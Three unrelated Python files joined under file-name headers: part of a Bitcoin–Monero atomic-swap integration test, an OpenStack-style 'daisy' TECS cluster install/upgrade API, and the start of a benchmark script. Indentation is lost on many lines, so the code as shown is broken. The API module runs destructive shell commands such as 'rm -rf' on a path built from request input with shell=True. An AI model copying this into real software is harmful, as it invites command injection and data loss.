cls.update_thread = threading.Thread(target=run_loop, args=(cls,))
cls.update_thread.start()
cls.initialiseTestState(cls)
@classmethod
def tearDownClass(cls):
logging.info('Finalising')
stopNodes(cls)
cls.stream_fp.close()
super(Test, cls).tearDownClass()
def callxmrnodewallet(self, node_id, method, params=None):
return callrpc_xmr(XMR_BASE_WALLET_RPC_PORT + node_id, self.xmr_wallet_auth[node_id], method, params)
def initialiseTestState(self):
# Called from a classmethod, seems to poison all method calls
logging.info('\nInitialising chain states')
# Why so many blocks?
num_blocks = 500
if callrpc_xmr_na(XMR_BASE_RPC_PORT + 0, 'get_block_count')['count'] < num_blocks:
logging.info('Mining %d Monero blocks.', num_blocks)
callrpc_xmr_na(XMR_BASE_RPC_PORT + 0, 'generateblocks', {'wallet_address': self.xmr_addr, 'amount_of_blocks': num_blocks})
rv = callrpc_xmr_na(XMR_BASE_RPC_PORT + 0, 'get_block_count')
logging.info('XMR blocks: %d', rv['count'])
if callnoderpc(0, 'getblockchaininfo')['blocks'] < num_blocks:
logging.info('Mining %d Bitcoin blocks to %s', num_blocks, self.btc_addr)
callnoderpc(0, 'generatetoaddress', [num_blocks, self.btc_addr])
rv = callnoderpc(0, 'getblockchaininfo')
logging.info('BTC blocks: %d', rv['blocks'])
btc_addr_alice1 = callnoderpc(ID_ALICE_BTC, 'getnewaddress', ['alice\'s main addr', 'bech32'])
callnoderpc(0, 'sendtoaddress', [btc_addr_alice1, 100])
xmr_addr_bob1 = self.callxmrnodewallet(self, ID_BOB_XMR, 'get_address')['address']
params = {'destinations': [{'amount': 50 * XMR_COIN, 'address': xmr_addr_bob1}]}
rv = self.callxmrnodewallet(self, 0, 'transfer', params)
logging.info('Sent initial XMR to Bob: %s', dumpj(rv))
logging.info('Testing node sync')
sync_passed = False
for i in range(20):
try:
                above_0 = 0
                for node_id in range(NUM_NODES):  # node_id avoids shadowing the retry counter i
                    r = callnoderpc(node_id, 'getblockchaininfo')
                    print('BTC', node_id, r['blocks'])
                    if r['blocks'] > 0:
                        above_0 += 1
                xmr_above_1 = 0
                for node_id in range(XMR_NUM_NODES):
                    r = callrpc_xmr_na(XMR_BASE_RPC_PORT + node_id, 'get_block_count')
                    print('XMR', node_id, r['count'])
                    if r['count'] > 2:  # xmr counts the genesis block as 1
                        xmr_above_1 += 1
if above_0 >= NUM_NODES and xmr_above_1 >= XMR_NUM_NODES:
logging.info('Node syncing passed.')
sync_passed = True
break
except Exception as e:
print('Error', repr(e))
time.sleep(1)
assert(sync_passed), 'Nodes did not sync'
num_tries = 40
for i in range(num_tries + 1):
rv = self.callxmrnodewallet(self, ID_BOB_XMR, 'get_balance')
if rv['balance'] > 0 and rv['blocks_to_unlock'] == 0:
break
r = callrpc_xmr_na(XMR_BASE_RPC_PORT + ID_BOB_XMR, 'get_block_count')
print(r)
if i >= num_tries:
raise ValueError('XMR Balance not confirming on node {}'.format(ID_BOB_XMR))
time.sleep(1)
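    # Initialise both parties' swap state files with matching parameters (Alice on the
    # scripted side 'a', Bob on the scriptless side 'b') and exchange the initial key
    # share messages msg1f / msg1l.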
def startSwap(self, ID_ALICE_SWAP, ID_BOB_SWAP, amount_a, amount_b):
logging.info('Set initial parameters.')
btc_addr_bob1 = callnoderpc(ID_BOB_BTC, 'getnewaddress', ['bob\'s addr', 'bech32'])
ignr, a_pkhash_f = segwit_addr.decode('bcrt', btc_addr_bob1)
# After a successful swap the coinA amount will be in an output to a_pkhash_f
swap_info = {
'side': 'a',
'a_coin': 'BTC',
'b_coin': 'XMR',
'a_amount': amount_a,
'b_amount': amount_b,
'a_feerate': 0.00032595,
'b_feerate': 0.0012595,
'a_pkhash_f': bytes(a_pkhash_f).hex(),
}
swap_info['a_connect'] = {
'port': BASE_RPC_PORT + ID_ALICE_BTC,
'username': 'test{}'.format(ID_ALICE_BTC),
'password': 'test_pass{0}'.format(ID_ALICE_BTC)}
swap_info['b_connect'] = {
'port': XMR_BASE_RPC_PORT + ID_ALICE_XMR,
'wallet_port': XMR_BASE_WALLET_RPC_PORT + ID_ALICE_XMR,
'wallet_auth': self.xmr_wallet_auth[ID_ALICE_XMR],
}
callSwapTool(ID_ALICE_SWAP, 'init', swap_info)
swap_info['a_connect'] = {
'port': BASE_RPC_PORT + ID_BOB_BTC,
'username': 'test{}'.format(ID_BOB_BTC),
'password': 'test_pass{0}'.format(ID_BOB_BTC)}
swap_info['b_connect'] = {
'port': XMR_BASE_RPC_PORT + ID_BOB_XMR,
'wallet_port': XMR_BASE_WALLET_RPC_PORT + ID_BOB_XMR,
'wallet_auth': self.xmr_wallet_auth[ID_BOB_XMR],
}
swap_info['side'] = 'b'
callSwapTool(ID_BOB_SWAP, 'init', swap_info)
logging.info('Alice and Bob exchange keys.')
msg1f = callSwapTool(ID_ALICE_SWAP, 'msg1f')
msg1l = callSwapTool(ID_BOB_SWAP, 'msg1l')
callSwapTool(ID_ALICE_SWAP, 'processmsg', str_param=msg1l)
callSwapTool(ID_BOB_SWAP, 'processmsg', str_param=msg1f)
def test_01_swap_successful(self):
checkSoftForks(callnoderpc(0, 'getblockchaininfo'))
ID_ALICE_SWAP = os.path.join(TEST_DIR, 'test_01_alice_swap_state') + '.json'
ID_BOB_SWAP = os.path.join(TEST_DIR, 'test_01_bob_swap_state') + '.json'
self.startSwap(ID_ALICE_SWAP, ID_BOB_SWAP, 1, 2)
logging.info('Alice creates the script-chain lock and refund txns and signs the refund tx, sends to Bob.')
msg2f = callSwapTool(ID_ALICE_SWAP, 'msg2f')
logging.info('Bob verifies the txns and signs the refund tx and creates an encrypted signature for the refund spend tx encumbered by Alice\'s coin B key share.')
callSwapTool(ID_BOB_SWAP, 'processmsg', str_param=msg2f)
msg3l = callSwapTool(ID_BOB_SWAP, 'msg3l')
logging.info('Alice verifies the signature and encrypted signature from Bob.')
callSwapTool(ID_ALICE_SWAP, 'processmsg', str_param=msg3l)
logging.info('Creates the lock spend tx and signs an encrypted signature encumbered by Bob\'s coin B key share')
msg4f = callSwapTool(ID_ALICE_SWAP, 'msg4f')
logging.info('Publishes the script-chain lock tx.')
a_lock_txid = callSwapTool(ID_ALICE_SWAP, 'publishalocktx')
# Check that the script-chain lock refund tx isn't mineable yet
try:
rv = callSwapTool(ID_ALICE_SWAP, 'publishalockrefundtx')
assert(False)
except Exception as e:
assert('non-BIP68-final' in str(e))
logging.info('Bob verifies the lock spend tx and encrypted signature from Alice.')
callSwapTool(ID_BOB_SWAP, 'processmsg', str_param=msg4f)
logging.info('Bob waits for the script-chain lock tx to confirm.')
num_tries = 30
for i in range(1 + num_tries):
rv = callSwapTool(ID_BOB_SWAP, 'confirmalocktx')
print('confirmalocktx', rv)
if rv.strip() == 'True':
break
if i >= num_tries:
raise ValueError('Timed out waiting for script-chain lock tx to confirm.')
logging.info('Then publishes the second-chain lock tx.')
b_lock_txid = callSwapTool(ID_BOB_SWAP, 'publishblocktx')
logging.info('Alice waits for the scriptless-chain lock tx to confirm.')
num_tries = 120
for i in range(1 + num_tries):
rv = callSwapTool(ID_ALICE_SWAP, 'confirmblocktx')
if rv.strip() == 'True':
break
if i >= num_tries:
raise ValueError('Timed out waiting for scriptless-chain lock tx to confirm.')
time.sleep(2)
logging.info('Alice shares the secret value with Bob, allowing the script-chain lock tx to be spent')
msg5f = callSwapTool(ID_ALICE_SWAP, 'msg5f')
callSwapTool(ID_BOB_SWAP, 'processmsg', str_param=msg5f)
logging.info('Bob spends from the script-chain lock tx')
alockspendtxid = callSwapTool(ID_BOB_SWAP, 'publishalockspendtx')
logging.info('alockspendtxid %s', alockspendtxid)
logging.info('Alice looks for Bob\'s script-chain lock spend tx and extracts the sig')
num_tries = 20
for i in range(1 + num_tries):
rv = callSwapTool(ID_ALICE_SWAP, 'findalockspendtx')
print('findalockspendtx', rv)
if rv.strip() == 'True':
break
if i >= num_tries:
raise ValueError('Timed out waiting for script-chain lock spend tx to confirm.')
time.sleep(1)
self.callxmrnodewallet(ID_ALICE_XMR, 'open_wallet', {'filename': 'testwallet'})
xmr_addr_alice1 = self.callxmrnodewallet(ID_ALICE_XMR, 'get_address')['address']
logging.info('Alice redeems the scriptless-chain lock tx to her address: %s', xmr_addr_alice1)
rv = callSwapTool(ID_ALICE_SWAP, 'redeemblocktx', str_param=xmr_addr_alice1)
print('redeemblocktx', rv)
self.callxmrnodewallet(ID_ALICE_XMR, 'close_wallet')
self.callxmrnodewallet(ID_ALICE_XMR, 'open_wallet', {'filename': 'testwallet'})
logging.info('Waiting for Alice\'s XMR to confirm...')
num_tries = 120
for i in range(num_tries + 1):
rv = self.callxmrnodewallet(ID_ALICE_XMR, 'get_balance')
if rv['balance'] > 0 and rv['blocks_to_unlock'] == 0:
break
r = callrpc_xmr_na(XMR_BASE_RPC_PORT + ID_ALICE_XMR, 'get_block_count')
print('XMR blocks', r['count'])
if i >= num_tries:
raise ValueError('Balance not confirming on node {}'.format(ID_ALICE_XMR))
time.sleep(2)
logging.info('Waiting for Bob\'s BTC to confirm...')
for i in range(num_tries + 1):
rv = callnoderpc(ID_BOB_BTC, 'getbalances')
if rv['mine']['trusted'] > 0:
break
print('btc height', i, callnoderpc(ID_BOB_BTC, 'getblockchaininfo')['blocks'])
if i >= num_tries:
                raise ValueError('Balance not confirming on node {}'.format(ID_BOB_BTC))
time.sleep(1)
def test_02_leader_recover_a_lock_tx(self):
ID_ALICE_SWAP = os.path.join(TEST_DIR, 'test_02_alice_swap_state') + '.json'
ID_BOB_SWAP = os.path.join(TEST_DIR, 'test_02_bob_swap_state') + '.json'
alice_btc_start = make_int(callnoderpc(ID_ALICE_BTC, 'getbalances')['mine']['trusted'])
bob_btc_start = make_int(callnoderpc(ID_BOB_BTC, 'getbalances')['mine']['trusted'])
alice_xmr_start = self.callxmrnodewallet(ID_ALICE_XMR, 'get_balance')['balance']
bob_xmr_start = self.callxmrnodewallet(ID_BOB_XMR, 'get_balance')['balance']
logging.info('Test start wallet states:\nalice_btc_start: %ld\nbob_btc_start: %ld\nalice_xmr_start: %ld\nbob_xmr_start: %ld',
alice_btc_start, bob_btc_start, alice_xmr_start, bob_xmr_start)
self.startSwap(ID_ALICE_SWAP, ID_BOB_SWAP, 2, 3)
logging.info('Alice creates the script-chain lock and refund txns and signs the refund tx, sends to Bob.')
msg2f = callSwapTool(ID_ALICE_SWAP, 'msg2f')
logging.info('Bob verifies the txns and signs the refund tx and creates an encrypted signature for the refund spend tx encumbered by Alice\'s coin B key share.')
callSwapTool(ID_BOB_SWAP, 'processmsg', str_param=msg2f)
msg3l = callSwapTool(ID_BOB_SWAP, 'msg3l')
logging.info('Alice verifies the signature and encrypted signature from Bob.')
callSwapTool(ID_ALICE_SWAP, 'processmsg', str_param=msg3l)
logging.info('Creates the lock spend tx and signs an encrypted signature encumbered by Bob\'s coin B key share')
msg4f = callSwapTool(ID_ALICE_SWAP, 'msg4f')
logging.info('Publishes the script-chain lock tx.')
a_lock_txid = callSwapTool(ID_ALICE_SWAP, 'publishalocktx').strip()
# Wait for the mining node to receive the tx
for i in range(10):
try:
callnoderpc(0, 'getrawtransaction', [a_lock_txid])
break
except Exception as e:
print('Waiting for node 0 to see tx', str(e))
time.sleep(1)
logging.info('Bob stops responding here.')
alice_btc = make_int(callnoderpc(ID_ALICE_BTC, 'getbalances')['mine']['trusted'])
logging.info('alice_btc %ld', alice_btc)
alockrefundtxid = None
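        # Mine blocks in batches until the BIP68 relative locktime on the refund tx has
        # expired and publishalockrefundtx no longer fails with 'non-BIP68-final'.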
for i in range(10):
callnoderpc(0, 'generatetoaddress', [30, self.btc_addr])
time.sleep(1)
logging.info('BTC blocks: %d', callnoderpc(ID_ALICE_BTC, 'getblockchaininfo')['blocks'])
try:
alockrefundtxid = callSwapTool(ID_ALICE_SWAP, 'publishalockrefundtx')
break
except Exception as e:
print(str(e))
if 'Transaction already in block chain' in str(e):
break
assert('non-BIP68-final' in str(e))
assert(alockrefundtxid is not None)
logging.info('alockrefundtxid %s', alockrefundtxid)
# Import key to receive refund in wallet. Simple method for testing.
kal = callSwapTool(ID_ALICE_SWAP, 'getkal')
kal_wif = bytes_to_wif(h2b(kal))
callnoderpc(ID_ALICE_BTC, 'importprivkey', [kal_wif, 'swap refund'])
alockrefundspendtxid = callSwapTool(ID_ALICE_SWAP, 'publishalockrefundspendtx')
rv = callnoderpc(ID_ALICE_BTC, 'getbalances')
alice_btc_end = make_int(rv['mine']['trusted']) + make_int(rv['mine']['untrusted_pending'])
logging.info('alice_btc_end %ld', alice_btc_end)
assert(alice_btc_end > alice_btc)
def test_03_follower_recover_a_lock_tx(self):
ID_ALICE_SWAP = os.path.join(TEST_DIR, 'test_03_alice_swap_state') + '.json'
ID_BOB_SWAP = os.path.join(TEST_DIR, 'test_03_bob_swap_state') + '.json'
alice_btc_start = make_int(callnoderpc(ID_ALICE_BTC, 'getbalances')['mine']['trusted'])
bob_btc_start = make_int(callnoderpc(ID_BOB_BTC, 'getbalances')['mine']['trusted'])
alice_xmr_start = self.callxmrnodewallet(ID_ALICE_XMR, 'get_balance')['balance']
bob_xmr_start = self.callxmrnodewallet(ID_BOB_XMR, 'get_balance')['balance']
logging.info('Test start wallet states:\nalice_btc_start: %ld\nbob_btc_start: %ld\nalice_xmr_start: %ld\nbob_xmr_start: %ld',
alice_btc_start, bob_btc_start, alice_xmr_start, bob_xmr_start)
# Same steps as in test_01_swap_successful
self.startSwap(ID_ALICE_SWAP, ID_BOB_SWAP, 3, 4)
msg2f = callSwapTool(ID_ALICE_SWAP, 'msg2f')
callSwapTool(ID_BOB_SWAP, 'processmsg', str_param=msg2f)
msg3l = callSwapTool(ID_BOB_SWAP, 'msg3l')
callSwapTool(ID_ALICE_SWAP, 'processmsg', str_param=msg3l)
msg4f = callSwapTool(ID_ALICE_SWAP, 'msg4f')
a_lock_txid = callSwapTool(ID_ALICE_SWAP, 'publishalocktx').strip()
logging.info('Alice stops responding here.')
# Wait for the mining node to receive the tx
for i in range(10):
try:
callnoderpc(0, 'getrawtransaction', [a_lock_txid])
break
except Exception as e:
print('Waiting for node 0 to see tx', str(e))
time.sleep(1)
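        # Mine past the relative locktime of the script-chain lock tx so the follower
        # can publish the lock refund tx even though the leader has stopped responding.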
logging.info('Mining 200 blocks.')
callnoderpc(0, 'generatetoaddress', [200, self.btc_addr])
time.sleep(2)
logging.info('BTC blocks: %d', callnoderpc(ID_BOB_BTC, 'getblockchaininfo')['blocks'])
a_lock_refund_txid = callSwapTool(ID_BOB_SWAP, 'publishalockrefundtx').strip()
logging.info('a_lock_refund_txid %s', a_lock_refund_txid)
# Wait for the mining node to receive the tx
for i in range(10):
try:
callnoderpc(0, 'getrawtransaction', [a_lock_refund_txid])
break
except Exception as e:
print('Waiting for node 0 to see tx', str(e))
time.sleep(1)
logging.info('Mining 200 blocks.')
callnoderpc(0, 'generatetoaddress', [200, self.btc_addr])
time.sleep(2)
btc_addr_bob = callnoderpc(ID_BOB_BTC, 'getnewaddress', ['bob\'s addr', 'bech32'])
ignr, a_pkhash_f = segwit_addr.decode('bcrt', btc_addr_bob)
time.sleep(1)
alockrefundspendtxid = callSwapTool(ID_BOB_SWAP, 'publishalockrefundspendftx', str_param=bytes(a_pkhash_f).hex())
rv = callnoderpc(ID_BOB_BTC, 'getbalances')
print('getbalances', dumpj(rv))
bob_btc_end = make_int(rv['mine']['trusted']) + make_int(rv['mine']['untrusted_pending'])
logging.info('bob_btc_end %ld', bob_btc_end)
assert(bob_btc_end > bob_btc_start)
def test_04_follower_recover_b_lock_tx(self):
ID_ALICE_SWAP = os.path.join(TEST_DIR, 'test_04_alice_swap_state') + '.json'
ID_BOB_SWAP = os.path.join(TEST_DIR, 'test_04_bob_swap_state') + '.json'
alice_btc_start = make_int(callnoderpc(ID_ALICE_BTC, 'getbalances')['mine']['trusted'])
bob_btc_start = make_int(callnoderpc(ID_BOB_BTC, 'getbalances')['mine']['trusted'])
alice_xmr_start = self.callxmrnodewallet(ID_ALICE_XMR, 'get_balance')['balance']
bob_xmr_start = self.callxmrnodewallet(ID_BOB_XMR, 'get_balance')['balance']
logging.info('Test start wallet states:\nalice_btc_start: %ld\nbob_btc_start: %ld\nalice_xmr_start: %ld\nbob_xmr_start: %ld',
alice_btc_start, bob_btc_start, alice_xmr_start, bob_xmr_start)
# Same steps as in test_01_swap_successful
self.startSwap(ID_ALICE_SWAP, ID_BOB_SWAP, 3, 4)
msg2f = callSwapTool(ID_ALICE_SWAP, 'msg2f')
callSwapTool(ID_BOB_SWAP, 'processmsg', str_param=msg2f)
msg3l = callSwapTool(ID_BOB_SWAP, 'msg3l')
callSwapTool(ID_ALICE_SWAP, 'processmsg', str_param=msg3l)
msg4f = callSwapTool(ID_ALICE_SWAP, 'msg4f')
a_lock_txid = callSwapTool(ID_ALICE_SWAP, 'publishalocktx').strip()
logging.info('Bob verifies the lock spend tx and encrypted signature from Alice.')
callSwapTool(ID_BOB_SWAP, 'processmsg', str_param=msg4f)
logging.info('Bob waits for the script-chain lock tx to confirm.')
num_tries = 30
for i in range(1 + num_tries):
rv = callSwapTool(ID_BOB_SWAP, 'confirmalocktx')
print('confirmalocktx', rv)
if rv.strip() == 'True':
break
if i >= num_tries:
raise ValueError('Timed out waiting for script-chain lock tx to confirm.')
logging.info('Then publishes the second-chain lock tx.')
b_lock_txid = callSwapTool(ID_BOB_SWAP, 'publishblocktx')
logging.info('Alice waits for the scriptless-chain lock tx to confirm.')
num_tries = 120
for i in range(1 + num_tries):
rv = callSwapTool(ID_ALICE_SWAP, 'confirmblocktx')
print('confirmblocktx', rv)
if rv.strip() == 'True':
break
if i >= num_tries:
raise ValueError('Timed out waiting for scriptless-chain lock tx to confirm.')
time.sleep(2)
logging.info('Alice detects a problem with the scriptless-chain lock tx and decides to cancel the swap')
callnoderpc(0, 'generatetoaddress', [150, self.btc_addr])
time.sleep(2)
logging.info('BTC blocks: %d', callnoderpc(ID_ALICE_BTC, 'getblockchaininfo')['blocks'])
alockrefundtxid = callSwapTool(ID_ALICE_SWAP, 'publishalockrefundtx')
# Import key to receive refund in wallet. Simple method for testing.
kal = callSwapTool(ID_ALICE_SWAP, 'getkal')
kal_wif = bytes_to_wif(h2b(kal))
callnoderpc(ID_ALICE_BTC, 'importprivkey', [kal_wif, 'swap refund'])
alockrefundspendtxid = callSwapTool(ID_ALICE_SWAP, 'publishalockrefundspendtx')
rv = callnoderpc(ID_ALICE_BTC, 'getbalances')
print('getbalances', dumpj(rv))
alice_btc = make_int(rv['mine']['trusted']) + make_int(rv['mine']['untrusted_pending'])
logging.info('alice_btc %ld', alice_btc)
logging.info('Bob waits for Alice to spend the lock refund tx.')
num_tries = 20
for i in range(1 + num_tries):
rv = callSwapTool(ID_BOB_SWAP, 'findalockrefundspendtx')
print('findalockrefundspendtx', rv)
if rv.strip() == 'True':
break
if i >= num_tries:
raise ValueError('Timed out waiting for script-chain lock refund spend tx to confirm.')
time.sleep(1)
logging.info('Then he can recover his scriptless-chain lock tx coin.')
self.callxmrnodewallet(ID_BOB_XMR, 'open_wallet', {'filename': 'testwallet'})
xmr_addr_bob = self.callxmrnodewallet(ID_BOB_XMR, 'get_address')['address']
rv = callSwapTool(ID_BOB_SWAP, 'redeemblocktx', str_param=xmr_addr_bob)
print('redeemblocktx', rv)
self.callxmrnodewallet(ID_BOB_XMR, 'close_wallet')
self.callxmrnodewallet(ID_BOB_XMR, 'open_wallet', {'filename': 'testwallet'})
if __name__ == '__main__':
unittest.main()
|
api.py
|
# Copyright 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
/install endpoint for tecs API
"""
import os
import copy
import subprocess
import time
import commands
import traceback
import webob.exc
from oslo_config import cfg
from oslo_log import log as logging
from webob.exc import HTTPBadRequest
from webob.exc import HTTPForbidden
from webob.exc import HTTPServerError
import threading
from threading import Thread
from daisy import i18n
from daisy import notifier
from daisy.api import policy
import daisy.api.v1
from daisy.common import exception
import daisy.registry.client.v1.api as registry
from daisy.api.backends.tecs import config
from daisy.api.backends import driver
from daisy.api.network_api import network as neutron
from ironicclient import client as ironic_client
import daisy.api.backends.os as os_handle
import daisy.api.backends.common as daisy_cmn
import daisy.api.backends.tecs.common as tecs_cmn
import daisy.api.backends.tecs.install as instl
import daisy.api.backends.tecs.uninstall as unstl
import daisy.api.backends.tecs.upgrade as upgrd
try:
import simplejson as json
except ImportError:
import json
LOG = logging.getLogger(__name__)
_ = i18n._
_LE = i18n._LE
_LI = i18n._LI
_LW = i18n._LW
tecs_state = tecs_cmn.TECS_STATE
class API(driver.DeploymentDriver):
"""
The hosts API is a RESTful web service for host data. The API
is as follows::
GET /hosts -- Returns a set of brief metadata about hosts
GET /hosts/detail -- Returns a set of detailed metadata about
hosts
HEAD /hosts/<ID> -- Return metadata about an host with id <ID>
GET /hosts/<ID> -- Return host data for host with id <ID>
POST /hosts -- Store host data and return metadata about the
newly-stored host
PUT /hosts/<ID> -- Update host metadata and/or upload host
data for a previously-reserved host
DELETE /hosts/<ID> -- Delete the host with id <ID>
"""
def __init__(self):
super(API, self).__init__()
return
def install(self, req, cluster_id):
"""
        Install TECS on a cluster.
        :param req: The WSGI/Webob Request object
        :param cluster_id: cluster id
"""
tecs_install_task = instl.TECSInstallTask(req, cluster_id)
tecs_install_task.start()
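    # Collect, for every role deployed with the TECS backend, the role ids, the
    # management IPs of all hosts, the IPs of CONTROLLER_HA hosts, and a de-duplicated
    # {host_id: ip} list.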
def _get_roles_and_hosts_ip_list(self, req, cluster_id):
host_ha_list = set()
host_ip_list = set()
role_id_list = set()
hosts_id_list = []
hosts_list = []
roles = daisy_cmn.get_cluster_roles_detail(req,cluster_id)
cluster_networks = daisy_cmn.get_cluster_networks_detail(req, cluster_id)
for role in roles:
if role['deployment_backend'] != daisy_cmn.tecs_backend_name:
continue
role_hosts = daisy_cmn.get_hosts_of_role(req, role['id'])
if role_hosts:
for role_host in role_hosts:
host = daisy_cmn.get_host_detail(req, role_host['host_id'])
host_ip = tecs_cmn.get_mngt_network_ip(host, cluster_networks)
if role['name'] == "CONTROLLER_HA":
host_ha_list.add(host_ip)
host_ip_list.add(host_ip)
hosts_id_list.append({host['id']:host_ip})
role_id_list.add(role['id'])
for host in hosts_id_list:
if host not in hosts_list:
hosts_list.append(host)
return (role_id_list, host_ip_list, host_ha_list, hosts_list)
def _query_progress(self, req, cluster_id, action=""):
nodes_list = []
roles = daisy_cmn.get_roles_detail(req)
(role_id_list,host_ip_list,host_ha_list,hosts_list) = self._get_roles_and_hosts_ip_list(req, cluster_id)
for host in hosts_list:
node = {}
host_id = host.keys()[0]
host = daisy_cmn.get_host_detail(req, host_id)
node['id'] = host['id']
node['name'] = host['name']
if 0 == cmp("upgrade", action):
node['os-progress'] = host['os_progress']
node['os-status'] = host['os_status']
node['os-messages'] = host['messages']
if host['status'] == "with-role":
host_roles = [ role for role in roles if role['name'] in host['role'] and role['cluster_id'] == cluster_id]
if host_roles:
node['role-status'] = host_roles[0]['status']
node['role-progress'] = str(host_roles[0]['progress'])
# node['role-message'] = host_roles[0]['messages']
nodes_list.append(node)
return {'tecs_nodes': nodes_list}
def uninstall(self, req, cluster_id):
"""
        Uninstall TECS from a cluster.
:param req: The WSGI/Webob Request object
:raises HTTPBadRequest if x-install-cluster is missing
"""
(role_id_list, host_ip_list,host_ha_list, hosts_list) = self._get_roles_and_hosts_ip_list(req, cluster_id)
if role_id_list:
if not host_ip_list:
msg = _("there is no host in cluster %s") % cluster_id
raise exception.ThreadBinException(msg)
unstl.update_progress_to_db(req, role_id_list, tecs_state['UNINSTALLING'], hosts_list, 0.0)
uninstall_progress_percentage = round(1*1.0/len(host_ip_list), 2)*100
threads = []
for host_ip in host_ip_list:
t = threading.Thread(target=unstl.thread_bin,args=(req,host_ip,role_id_list,uninstall_progress_percentage))
t.setDaemon(True)
t.start()
threads.append(t)
LOG.info(_("uninstall threads have started, please waiting...."))
try:
for t in threads:
t.join()
except:
LOG.warn(_("Join uninstall thread %s failed!" % t))
else:
uninstall_failed_flag = False
for role_id in role_id_list:
role = daisy_cmn.get_role_detail(req, role_id)
                    # if progress is still 100, something was not ready when uninstalling;
                    # status == 'uninstalling' or progress == 0 cannot be used for this check
if role['progress'] == 100:
unstl.update_progress_to_db(req, role_id_list, tecs_state['UNINSTALL_FAILED'], hosts_list)
uninstall_failed_flag = True
break
if role['status'] == tecs_state['UNINSTALL_FAILED']:
uninstall_failed_flag = True
break
if not uninstall_failed_flag:
LOG.info(_("all uninstall threads have done, set all roles status to 'init'!"))
unstl.update_progress_to_db(req, role_id_list, tecs_state['INIT'], hosts_list)
try:
(status, output) = commands.getstatusoutput('rpm -e --nodeps openstack-packstack\
openstack-packstack-puppet openstack-puppet-modules puppet')
except exception.Invalid as e:
raise HTTPBadRequest(explanation=e.msg, request=req)
def uninstall_progress(self, req, cluster_id):
return self._query_progress(req, cluster_id, "uninstall")
def upgrade(self, req, cluster_id):
"""
        Upgrade TECS on a cluster.
:param req: The WSGI/Webob Request object
:raises HTTPBadRequest if x-install-cluster is missing
"""
(role_id_list,host_ip_list,host_ha_list,hosts_list) = self._get_roles_and_hosts_ip_list(req, cluster_id)
if role_id_list:
if not host_ip_list:
msg = _("there is no host in cluster %s") % cluster_id
raise exception.ThreadBinException(msg)
unreached_hosts = daisy_cmn.check_ping_hosts(host_ip_list, 1)
if unreached_hosts:
self.message = "hosts %s ping failed" % unreached_hosts
raise exception.NotFound(message=self.message)
daisy_cmn.subprocess_call('rm -rf /root/.ssh/known_hosts')
if os_handle.check_tfg_exist():
os_handle.upgrade_os(req, hosts_list)
unreached_hosts = daisy_cmn.check_ping_hosts(host_ip_list, 30)
if unreached_hosts:
self.message = "hosts %s ping failed after tfg upgrade" % unreached_hosts
raise exception.NotFound(message=self.message)
upgrd.update_progress_to_db(req, role_id_list, tecs_state['UPDATING'], 0.0)
update_progress_percentage = round(1*1.0/len(host_ip_list), 2)*100
threads = []
LOG.info(_("begin to update TECS controller nodes, please waiting...."))
for host_ip in host_ha_list:
LOG.info(_("update TECS controller node %s..." % host_ip))
upgrd.thread_bin(req,host_ip,role_id_list,update_progress_percentage)
LOG.info(_("begin to update TECS other nodes, please waiting...."))
for host_ip in (host_ip_list - host_ha_list):
t = threading.Thread(target=upgrd.thread_bin,args=(req,host_ip,role_id_list,update_progress_percentage))
t.setDaemon(True)
t.start()
threads.append(t)
try:
for t in threads:
t.join()
except:
LOG.warn(_("Join update thread %s failed!" % t))
else:
update_failed_flag = False
for role_id in role_id_list:
role = registry.get_role_metadata(req.context, role_id)
                    # if progress is still 0, something was not ready when updating;
                    # status == 'updating' or progress == 100 cannot be used for this check
if role['progress'] == 0:
upgrd.update_progress_to_db(req, role_id_list, tecs_state['UPDATE_FAILED'])
update_failed_flag = True
break
if role['status'] == tecs_state['UPDATE_FAILED']:
update_failed_flag = True
break
if not update_failed_flag:
LOG.info(_("all update threads have done, set all roles status to 'active'!"))
upgrd.update_progress_to_db(req, role_id_list, tecs_state['ACTIVE'])
def upgrade_progress(self, req, cluster_id):
return self._query_progress(req, cluster_id, "upgrade")
def export_db(self, req, cluster_id):
"""
Export daisy db data to tecs.conf and HA.conf.
:param req: The WSGI/Webob Request object
:raises HTTPBadRequest if x-install-cluster is missing
"""
(tecs_config, mgnt_ip_list) = instl.get_cluster_tecs_config(req, cluster_id)
config_files = {'tecs_conf':'','ha_conf':''}
tecs_install_path = "/home/tecs_install"
tecs_config_file = ''
if tecs_config:
cluster_conf_path = tecs_install_path + "/" + cluster_id
create_cluster_conf_path = "rm -rf %s; mkdir %s" % (cluster_conf_path, cluster_conf_path)
daisy_cmn.subprocess_call(create_cluster_conf_path)
config.update_tecs_conf(tecs_config, cluster_conf_path)
get_tecs_conf = "ls %s|grep tecs.conf" % cluster_conf_path
obj = subprocess.Popen(get_tecs_conf, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(stdoutput, erroutput) = obj.communicate()
tecs_conf_file = ""
if stdoutput:
tecs_conf_file = stdoutput.split('\n')[0]
config_files['tecs_conf'] = cluster_conf_path + "/" + tecs_conf_file
get_ha_conf_cmd = "ls %s|grep HA_1.conf" % cluster_conf_path
obj = subprocess.Popen(get_ha_conf_cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(stdoutput, erroutput) = obj.communicate()
ha_conf_file = ""
if stdoutput:
ha_conf_file = stdoutput.split('\n')[0]
config_files['ha_conf'] = cluster_conf_path + "/" + ha_conf_file
return config_files
|
no_loadgen.py
|
#!/usr/bin/env python3
import threading
import dataset
import argparse
import coco
import imagenet
import os
import time
import cli_colors
import multiprocessing as mp
import pandas as pd
from queue import Queue
SUPPORTED_DATASETS = {
"imagenet":
(imagenet.Imagenet, dataset.pre_process_vgg, dataset.PostProcessCommon(offset=-1),
{"image_size": [224, 224, 3]}),
"imagenet_mobilenet":
(imagenet.Imagenet, dataset.pre_process_mobilenet, dataset.PostProcessArgMax(offset=-1),
{"image_size": [224, 224, 3]}),
"imagenet_pytorch":
(imagenet.Imagenet, dataset.pre_process_imagenet_pytorch, dataset.PostProcessArgMax(offset=0),
{"image_size": [224, 224, 3]}),
"coco-300":
(coco.Coco, dataset.pre_process_coco_mobilenet, coco.PostProcessCoco(),
{"image_size": [300, 300, 3]}),
"coco-300-pt":
